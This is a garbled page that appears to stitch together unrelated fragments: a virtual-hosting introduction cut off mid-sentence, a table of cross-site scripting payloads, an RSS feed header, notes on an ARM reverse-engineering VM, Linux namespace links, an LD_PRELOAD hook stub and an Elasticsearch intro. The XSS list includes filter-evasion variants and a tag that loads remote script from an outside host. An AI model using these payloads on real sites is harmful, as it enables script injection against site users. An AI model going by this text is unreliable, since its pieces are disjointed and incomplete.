When hosting our web applications, we often have one public IP
address (i.e., an IP address visible to the outside world)
using which we want to host multiple web apps. For example, one
may wants to host three different web apps respectively for
example1.com, example2.com, and example1.com/images on
the same machine using a single IP address.
How can we do that? Well, the good news is Internet browsers
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
| <?xml version="1.0" encoding="UTF-8"?> | |
| <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:cc="http://web.resource.org/cc/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:media="http://search.yahoo.com/mrss/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> | |
| <channel> | |
| <atom:link href="http://dataskeptic.libsyn.com/rss" rel="self" type="application/rss+xml"/> | |
| <title>Data Skeptic</title> | |
| <pubDate>Fri, 15 Jan 2016 15:00:00 +0000</pubDate> | |
| <lastBuildDate>Fri, 15 Jan 2016 15:08:58 +0000</lastBuildDate> | |
| <generator>Libsyn WebEngine 2.0</generator> | |
| <link>http://dataskeptic.com</link> | |
| <language>en</language> |
I recently came across a tutorial on ARM Reverse Engineering https://azeria-labs.com/writing-arm-assembly-part-1/.
However, this tutorial seems to recommend using a Raspberry Pi for following along with the tutorial. I decided I wanted to be able to work through the tutorial using a virtual machine, so I built a QEMU VM of the ARMEL architecture. This is the same architecture that the Raspberry Pi is based off of. I went with debian for ARMEL because its the OS I'm most familiar with. After the operating system is installed, I install tools like GDB and GEF for debugging / reverse engineering.
GEF is a plugin for GDB specifically built for reverse engineering and exploit development. From https://github.com/hugsy/gef.git:
namespaces - overview of Linux namespaces http://man7.org/linux/man-pages/man7/namespaces.7.html
mount_namespaces - overview of Linux mount namespaces
| /* | |
| * Hook main() using LD_PRELOAD, because why not? | |
| * Obviously, this code is not portable. Use at your own risk. | |
| * | |
| * Compile using 'gcc hax.c -o hax.so -fPIC -shared -ldl' | |
| * Then run your program as 'LD_PRELOAD=$PWD/hax.so ./a.out' | |
| */ | |
| #define _GNU_SOURCE | |
| #include <stdio.h> |
This is a collection of the most common commands I run while administering Elasticsearch databases. The variables shown between the open and closed tags, "<" and ">", should be replaced with a name you choose.
https://www.elastic.co/guide/en/elasticsearch/client/curator/5.x/command-line.html
I would suggest using my ELK vagrant project to use these commands:
